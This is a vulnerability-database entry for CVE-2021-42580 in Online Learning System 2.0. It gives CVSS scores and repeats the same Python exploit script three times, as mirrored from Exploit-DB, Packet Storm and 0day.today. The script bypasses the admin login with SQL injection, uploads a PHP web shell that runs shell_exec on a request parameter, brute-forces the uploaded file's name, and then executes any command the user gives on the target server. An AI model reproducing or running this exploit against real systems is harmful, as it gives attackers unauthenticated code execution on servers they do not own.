Online Learning System 2.0 - Remote Code Execution (RCE)

2021-11-16T00:00:00

Description

{"id": "EDB-ID:50526", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Online Learning System 2.0 - Remote Code Execution (RCE)", "description": "", "published": "2021-11-16T00:00:00", "modified": "2021-11-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/50526", "reporter": "djebbaranon", "references": [], "cvelist": ["CVE-2021-42580", "2021-42580"], "immutableFields": [], "lastseen": "2022-01-13T05:28:06", "viewCount": 364, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-42580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164985"]}, {"type": "zdt", "idList": ["1337DAY-ID-37049"]}], "rev": 4}, "score": {"value": 6.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004", "CVE-2021-42580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164985"]}, {"type": "zdt", "idList": ["1337DAY-ID-37049"]}]}, "exploitation": null, "vulnersScore": 6.3}, "sourceHref": "https://www.exploit-db.com/download/50526", "sourceData": "# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)\r\n# Date: 15/11/2021\r\n# Exploit Author: djebbaranon\r\n# Vendor Homepage: https://github.com/oretnom23\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip\r\n# Version: 2.0\r\n# Tested on: Kali linux / Windows 10\r\n# CVE : CVE-2021-42580\r\n\r\n#!/usr/bin/python3\r\nimport os\r\nimport time\r\nimport argparse\r\nimport requests\r\nimport sys\r\nfrom colorama import init\r\nfrom colorama import Fore\r\nfrom colorama import Back\r\nfrom colorama import Style\r\ninit(autoreset=True)\r\ndef banner():\r\n\tprint('''\r\n\r\n _____ _ _ _ _ _____ ______ _____ _____ \r\n| _ | | (_) | | (_) / __ \\ | ___ / __ | ___|\r\n| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \\| |__ \r\n| | | | '_ \\| | | '_ \\ / _ \\ | |/ _ \\/ _` | '__| '_ \\| | '_ \\ / _` | \\ \\ / / / / | /| | | __| \r\n\\ \\_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \\ V /./ /___ | |\\ \\| \\__/| |___ \r\n \\___/|_| |_|_|_|_| |_|\\___| |_|\\___|\\__,_|_| |_| |_|_|_| |_|\\__, | \\_/ \\_____/ \\_| \\_|\\____\\____/ \r\n __/ | \r\n |___/ \r\n\t\tWritten by djebbaranon \r\n\t\ttwitter : @dj3bb4ran0n1\r\n\t\tzone-h : http://zone-h.org/archive/notifier=djebbaranon\r\n''')\r\nbanner()\r\ndef my_args():\r\n\tparser = argparse.ArgumentParser(epilog=\"Example : python3 -u http://localhost/elearning -r 1000 -c whoami\")\r\n\tparser.add_argument(\"-u\",\"--url\",type=str,required=True,help=\"url of target\")\r\n\tparser.add_argument(\"-r\",\"--range\",type=int,required=True,help=\"range for bruteforce the webshell name\")\r\n\tparser.add_argument(\"-c\",\"--command\",type=str,required=True,help=\"command to execute\")\r\n\tmy_arguments = parser.parse_args()\r\n\treturn my_arguments\r\ndef login_with_sqli_login_bypass(user,passw):\r\n\tglobal session\r\n\tglobal url\r\n\tglobal cookies\r\n\turl = my_args().url\r\n\tsession = requests.Session()\r\n\tdata = {\r\n\t\"username\" : user,\r\n\t\"password\" : passw,\r\n\t}\r\n\ttry:\r\n\t\tresponse = session.post(url + \"/classes/Login.php?f=login\",data=data,verify=False)\r\n\t\tprint( Fore.GREEN + \"[+] Logged in succsusfully\")\r\n\t\tcookies = response.cookies.get_dict()\r\n\t\tprint(\"[+] your cookie : \")\r\n\texcept requests.HTTPError as exception:\r\n\t\tprint(Fore.RED + \"[-] HTTP Error : {}\".format(exception))\r\n\t\tsys.exit(1)\r\nlogin_with_sqli_login_bypass(\"' or 1=1 -- -\",\"' or 1=1 -- -\")\r\ndef main(shell_name,renamed_shell):\r\n\ttry:\r\n\t\tpayload ={\r\n\t\t\t\"id\" : \"\",\r\n\t\t\t\"faculty_id\" : \"test\",\r\n\t\t\t\"firstname\" : \"test\",\r\n\t\t\t\"lastname\" : \"test\",\r\n\t\t\t\"middlename\" : \"fsdfsd\",\r\n\t\t\t\"dob\" : \"2021-10-29\",\r\n\t\t\t\"gender\": \"Male\",\r\n\t\t\t\"department_id\" : \"1\",\r\n\t\t\t\"email\" : \"zebi@gmail.com\",\r\n\t\t\t\"contact\" : \"zebii\",\r\n\t\t\t\"address\" : \"zebii\",\t\r\n\t\t}\r\n\t\tfiles = {\r\n\t\t\t\"img\" :\r\n\t\t\t\t(\r\n\t\t\t\t\tshell_name,\r\n\t\t\t\t\t\"<?php echo \\\"<pre><h1>nikmok</h1>\\\" . shell_exec($_REQUEST['cmd']) . \\\"</pre>\\\"?>\",\r\n\t\t\t\t\t\"application/octet-stream\",\r\n\t\t\t\t\t)\r\n\t\t}\r\n\t\tvunlerable_file = \"/classes/Master.php?f=save_faculty\"\r\n\t\tprint(\"[*] Trying to upload webshell ....\")\r\n\t\tresponse_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)\r\n\t\tprint(\"[+] trying to bruteforce the webshell ....\")\r\n\t\trangee = my_args().range\r\n\t\tfor i in range(0,rangee):\r\n\t\t\ttry:\r\n\t\t\t\twith requests.get(url + \"/uploads/Favatar_\" + str(i) + \".php?cmd=whoami\",allow_redirects=False) as response3:\r\n\t\t\t\t\tif \"nikmok\" in response3.text and response3.status_code == 200:\r\n\t\t\t\t\t\tprint(\"\\n\" + Fore.GREEN + \"[+] shell found : \" + response3.url +\"\\n\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\twith open(\"shell.txt\",mode=\"w+\") as writer:\r\n\t\t\t\t\t\t\twriter.write(response3.url)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint( Fore.RED + \"[-] shell not found : \" + response3.url)\r\n\t\t\texcept requests.HTTPError as exception2:\r\n\t\t\t\tprint(\"[-] HTTP Error : {0} \".format(exception2))\r\n\texcept requests.HTTPError as error:\r\n\t\tprint(\"[-] HTTP Error : \".format(error))\r\n\tcommand = my_args().command\r\n\twith requests.get(response3.url.replace(\"whoami\",command)) as response4:\r\n\t\tprint(\"[*] Executing {} ....\".format(command))\r\n\t\ttime.sleep(3)\r\n\t\tprint(\"\\n\" + Style.BRIGHT + Fore.GREEN + response4.text)\r\nmain(\"hackerman.php\",\"\")", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1646243959}}

{"packetstorm": [{"lastseen": "2021-11-16T15:57:02", "description": "", "cvss3": {}, "published": "2021-11-16T00:00:00", "type": "packetstorm", "title": "Online Learning System 2.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-42580"], "modified": "2021-11-16T00:00:00", "id": "PACKETSTORM:164985", "href": "https://packetstormsecurity.com/files/164985/Online-Learning-System-2.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE) \n# Date: 15/11/2021 \n# Exploit Author: djebbaranon \n# Vendor Homepage: https://github.com/oretnom23 \n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip \n# Version: 2.0 \n# Tested on: Kali linux / Windows 10 \n# CVE : CVE-2021-42580 \n \n#!/usr/bin/python3 \nimport os \nimport time \nimport argparse \nimport requests \nimport sys \nfrom colorama import init \nfrom colorama import Fore \nfrom colorama import Back \nfrom colorama import Style \ninit(autoreset=True) \ndef banner(): \nprint(''' \n \n_____ _ _ _ _ _____ ______ _____ _____ \n| _ | | (_) | | (_) / __ \\ | ___ / __ | ___| \n| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \\| |__ \n| | | | '_ \\| | | '_ \\ / _ \\ | |/ _ \\/ _` | '__| '_ \\| | '_ \\ / _` | \\ \\ / / / / | /| | | __| \n\\ \\_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \\ V /./ /___ | |\\ \\| \\__/| |___ \n\\___/|_| |_|_|_|_| |_|\\___| |_|\\___|\\__,_|_| |_| |_|_|_| |_|\\__, | \\_/ \\_____/ \\_| \\_|\\____\\____/ \n__/ | \n|___/ \nWritten by djebbaranon \ntwitter : @dj3bb4ran0n1 \nzone-h : http://zone-h.org/archive/notifier=djebbaranon \n''') \nbanner() \ndef my_args(): \nparser = argparse.ArgumentParser(epilog=\"Example : python3 -u http://localhost/elearning -r 1000 -c whoami\") \nparser.add_argument(\"-u\",\"--url\",type=str,required=True,help=\"url of target\") \nparser.add_argument(\"-r\",\"--range\",type=int,required=True,help=\"range for bruteforce the webshell name\") \nparser.add_argument(\"-c\",\"--command\",type=str,required=True,help=\"command to execute\") \nmy_arguments = parser.parse_args() \nreturn my_arguments \ndef login_with_sqli_login_bypass(user,passw): \nglobal session \nglobal url \nglobal cookies \nurl = my_args().url \nsession = requests.Session() \ndata = { \n\"username\" : user, \n\"password\" : passw, \n} \ntry: \nresponse = session.post(url + \"/classes/Login.php?f=login\",data=data,verify=False) \nprint( Fore.GREEN + \"[+] Logged in succsusfully\") \ncookies = response.cookies.get_dict() \nprint(\"[+] your cookie : \") \nexcept requests.HTTPError as exception: \nprint(Fore.RED + \"[-] HTTP Error : {}\".format(exception)) \nsys.exit(1) \nlogin_with_sqli_login_bypass(\"' or 1=1 -- -\",\"' or 1=1 -- -\") \ndef main(shell_name,renamed_shell): \ntry: \npayload ={ \n\"id\" : \"\", \n\"faculty_id\" : \"test\", \n\"firstname\" : \"test\", \n\"lastname\" : \"test\", \n\"middlename\" : \"fsdfsd\", \n\"dob\" : \"2021-10-29\", \n\"gender\": \"Male\", \n\"department_id\" : \"1\", \n\"email\" : \"zebi@gmail.com\", \n\"contact\" : \"zebii\", \n\"address\" : \"zebii\", \n} \nfiles = { \n\"img\" : \n( \nshell_name, \n\"<?php echo \\\"<pre><h1>nikmok</h1>\\\" . shell_exec($_REQUEST['cmd']) . \\\"</pre>\\\"?>\", \n\"application/octet-stream\", \n) \n} \nvunlerable_file = \"/classes/Master.php?f=save_faculty\" \nprint(\"[*] Trying to upload webshell ....\") \nresponse_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files) \nprint(\"[+] trying to bruteforce the webshell ....\") \nrangee = my_args().range \nfor i in range(0,rangee): \ntry: \nwith requests.get(url + \"/uploads/Favatar_\" + str(i) + \".php?cmd=whoami\",allow_redirects=False) as response3: \nif \"nikmok\" in response3.text and response3.status_code == 200: \nprint(\"\\n\" + Fore.GREEN + \"[+] shell found : \" + response3.url +\"\\n\") \nbreak \nwith open(\"shell.txt\",mode=\"w+\") as writer: \nwriter.write(response3.url) \nelse: \nprint( Fore.RED + \"[-] shell not found : \" + response3.url) \nexcept requests.HTTPError as exception2: \nprint(\"[-] HTTP Error : {0} \".format(exception2)) \nexcept requests.HTTPError as error: \nprint(\"[-] HTTP Error : \".format(error)) \ncommand = my_args().command \nwith requests.get(response3.url.replace(\"whoami\",command)) as response4: \nprint(\"[*] Executing {} ....\".format(command)) \ntime.sleep(3) \nprint(\"\\n\" + Style.BRIGHT + Fore.GREEN + response4.text) \nmain(\"hackerman.php\",\"\") \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164985/ols20-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T19:34:03", "description": "Sourcecodester Online Learning System 2.0 is vunlerable to sql injection authentication bypass in admin login file (/admin/login.php) and authenticated file upload in (Master.php) file , we can craft these two vunlerablities to get unauthenticated remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-15T16:15:00", "type": "cve", "title": "CVE-2021-42580", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42580"], "modified": "2021-11-26T15:18:00", "cpe": ["cpe:/a:online_learning_system_project:online_learning_system:2.0"], "id": "CVE-2021-42580", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:online_learning_system_project:online_learning_system:2.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2022-01-03T05:52:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T00:00:00", "type": "zdt", "title": "Online Learning System 2.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42580"], "modified": "2021-11-16T00:00:00", "id": "1337DAY-ID-37049", "href": "https://0day.today/exploit/description/37049", "sourceData": "# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)\n# Exploit Author: djebbaranon\n# Vendor Homepage: https://github.com/oretnom23\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip\n# Version: 2.0\n# Tested on: Kali linux / Windows 10\n# CVE : CVE-2021-42580\n\n#!/usr/bin/python3\nimport os\nimport time\nimport argparse\nimport requests\nimport sys\nfrom colorama import init\nfrom colorama import Fore\nfrom colorama import Back\nfrom colorama import Style\ninit(autoreset=True)\ndef banner():\n\tprint('''\n\n _____ _ _ _ _ _____ ______ _____ _____ \n| _ | | (_) | | (_) / __ \\ | ___ / __ | ___|\n| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \\| |__ \n| | | | '_ \\| | | '_ \\ / _ \\ | |/ _ \\/ _` | '__| '_ \\| | '_ \\ / _` | \\ \\ / / / / | /| | | __| \n\\ \\_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \\ V /./ /___ | |\\ \\| \\__/| |___ \n \\___/|_| |_|_|_|_| |_|\\___| |_|\\___|\\__,_|_| |_| |_|_|_| |_|\\__, | \\_/ \\_____/ \\_| \\_|\\____\\____/ \n __/ | \n |___/ \n\t\tWritten by djebbaranon \n\t\ttwitter : @dj3bb4ran0n1\n\t\tzone-h : http://zone-h.org/archive/notifier=djebbaranon\n''')\nbanner()\ndef my_args():\n\tparser = argparse.ArgumentParser(epilog=\"Example : python3 -u http://localhost/elearning -r 1000 -c whoami\")\n\tparser.add_argument(\"-u\",\"--url\",type=str,required=True,help=\"url of target\")\n\tparser.add_argument(\"-r\",\"--range\",type=int,required=True,help=\"range for bruteforce the webshell name\")\n\tparser.add_argument(\"-c\",\"--command\",type=str,required=True,help=\"command to execute\")\n\tmy_arguments = parser.parse_args()\n\treturn my_arguments\ndef login_with_sqli_login_bypass(user,passw):\n\tglobal session\n\tglobal url\n\tglobal cookies\n\turl = my_args().url\n\tsession = requests.Session()\n\tdata = {\n\t\"username\" : user,\n\t\"password\" : passw,\n\t}\n\ttry:\n\t\tresponse = session.post(url + \"/classes/Login.php?f=login\",data=data,verify=False)\n\t\tprint( Fore.GREEN + \"[+] Logged in succsusfully\")\n\t\tcookies = response.cookies.get_dict()\n\t\tprint(\"[+] your cookie : \")\n\texcept requests.HTTPError as exception:\n\t\tprint(Fore.RED + \"[-] HTTP Error : {}\".format(exception))\n\t\tsys.exit(1)\nlogin_with_sqli_login_bypass(\"' or 1=1 -- -\",\"' or 1=1 -- -\")\ndef main(shell_name,renamed_shell):\n\ttry:\n\t\tpayload ={\n\t\t\t\"id\" : \"\",\n\t\t\t\"faculty_id\" : \"test\",\n\t\t\t\"firstname\" : \"test\",\n\t\t\t\"lastname\" : \"test\",\n\t\t\t\"middlename\" : \"fsdfsd\",\n\t\t\t\"dob\" : \"2021-10-29\",\n\t\t\t\"gender\": \"Male\",\n\t\t\t\"department_id\" : \"1\",\n\t\t\t\"email\" : \"[email\u00a0protected]\",\n\t\t\t\"contact\" : \"zebii\",\n\t\t\t\"address\" : \"zebii\",\t\n\t\t}\n\t\tfiles = {\n\t\t\t\"img\" :\n\t\t\t\t(\n\t\t\t\t\tshell_name,\n\t\t\t\t\t\"<?php echo \\\"<pre><h1>nikmok</h1>\\\" . shell_exec($_REQUEST['cmd']) . \\\"</pre>\\\"?>\",\n\t\t\t\t\t\"application/octet-stream\",\n\t\t\t\t\t)\n\t\t}\n\t\tvunlerable_file = \"/classes/Master.php?f=save_faculty\"\n\t\tprint(\"[*] Trying to upload webshell ....\")\n\t\tresponse_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)\n\t\tprint(\"[+] trying to bruteforce the webshell ....\")\n\t\trangee = my_args().range\n\t\tfor i in range(0,rangee):\n\t\t\ttry:\n\t\t\t\twith requests.get(url + \"/uploads/Favatar_\" + str(i) + \".php?cmd=whoami\",allow_redirects=False) as response3:\n\t\t\t\t\tif \"nikmok\" in response3.text and response3.status_code == 200:\n\t\t\t\t\t\tprint(\"\\n\" + Fore.GREEN + \"[+] shell found : \" + response3.url +\"\\n\")\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\twith open(\"shell.txt\",mode=\"w+\") as writer:\n\t\t\t\t\t\t\twriter.write(response3.url)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint( Fore.RED + \"[-] shell not found : \" + response3.url)\n\t\t\texcept requests.HTTPError as exception2:\n\t\t\t\tprint(\"[-] HTTP Error : {0} \".format(exception2))\n\texcept requests.HTTPError as error:\n\t\tprint(\"[-] HTTP Error : \".format(error))\n\tcommand = my_args().command\n\twith requests.get(response3.url.replace(\"whoami\",command)) as response4:\n\t\tprint(\"[*] Executing {} ....\".format(command))\n\t\ttime.sleep(3)\n\t\tprint(\"\\n\" + Style.BRIGHT + Fore.GREEN + response4.text)\nmain(\"hackerman.php\",\"\")\n", "sourceHref": "https://0day.today/exploit/37049", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Online Learning System 2.0 - Remote Code Execution (RCE)

Description

Related